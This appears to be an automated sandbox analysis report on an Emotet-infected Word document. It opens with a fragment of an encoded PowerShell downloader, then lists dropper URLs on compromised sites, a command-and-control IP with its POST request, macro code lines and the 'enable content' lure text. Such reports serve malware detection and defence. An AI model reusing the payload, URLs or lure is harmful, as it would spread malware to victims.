JwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArA

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: http://veterinariadrpopui.com/content/5f18Q/Avira URL Cloud: Label: malware
                    Source: http://khanhhoahomnay.net/wordpress/CGMC/Avira URL Cloud: Label: malware
                    Source: http://shop.elemenslide.com/wp-content/n/Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: DATA-480841.docVirustotal: Detection: 59%Perma Link
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002175AE CryptDecodeObjectEx,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0021109C FindFirstFileW,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: global trafficDNS query: name: wpsapk.com
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80

                    Networking:

                    barindex
                    Potential dropper URLs found in powershell memoryShow sources
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://wpsapk.com/wp-admin/v/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://veterinariadrpopui.com/content/5f18Q/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://shop.elemenslide.com/wp-content/n/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                    Source: global trafficHTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 209.59.139.39 209.59.139.39
                    Source: Joe Sandbox ViewIP Address: 5.2.136.90 5.2.136.90
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global trafficHTTP traffic detected: POST /6tycsc/ HTTP/1.1DNT: 0Referer: 5.2.136.90/6tycsc/Content-Type: multipart/form-data; boundary=----------OGLPvif2cEUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 7412Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0022023A InternetReadFile,
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B01F17D-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: unknownDNS traffic detected: queries for: wpsapk.com
                    Source: unknownHTTP traffic detected: POST /6tycsc/ HTTP/1.1DNT: 0Referer: 5.2.136.90/6tycsc/Content-Type: multipart/form-data; boundary=----------OGLPvif2cEUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 7412Connection: Keep-AliveCache-Control: no-cache
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                    Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: http://khanhhoahomnay.net
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                    Source: powershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                    Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: http://shop.elemenslide.com
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://shop.elemenslide.com/wp-content/n/
                    Source: powershell.exe, 00000005.00000002.2117671209.0000000003B34000.00000004.00000001.sdmpString found in binary or memory: http://sofsuite.com
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
                    Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: http://veterinariadrpopui.com
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                    Source: powershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmpString found in binary or memory: http://wpsapk.com
                    Source: powershell.exe, 00000005.00000002.2122315304.000000001B916000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: http://wpsapk.com/wp-admin/v/
                    Source: powershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                    Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                    Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                    Source: rundll32.exe, 00000008.00000002.2112048540.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                    Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmpString found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
                    Source: powershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
                    Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                    Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
                    Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
                    Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Document contains an embedded VBA macro with suspicious stringsShow sources
                    Source: DATA-480841.docOLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                    Source: DATA-480841.docOLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                    Source: DATA-480841.docOLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                    Source: DATA-480841.docOLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                    Source: DATA-480841.docOLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                    Source: DATA-480841.docOLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                    Source: DATA-480841.docOLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                    Source: DATA-480841.docOLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                    Source: DATA-480841.docOLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                    Source: DATA-480841.docOLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                    Source: DATA-480841.docOLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                    Source: DATA-480841.docOLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                    Source: DATA-480841.docOLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                    Source: DATA-480841.docOLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                    Source: DATA-480841.docOLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                    Source: DATA-480841.docOLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                    Source: DATA-480841.docOLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                    Source: DATA-480841.docOLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                    Document contains an embedded VBA with base64 encoded stringsShow sources
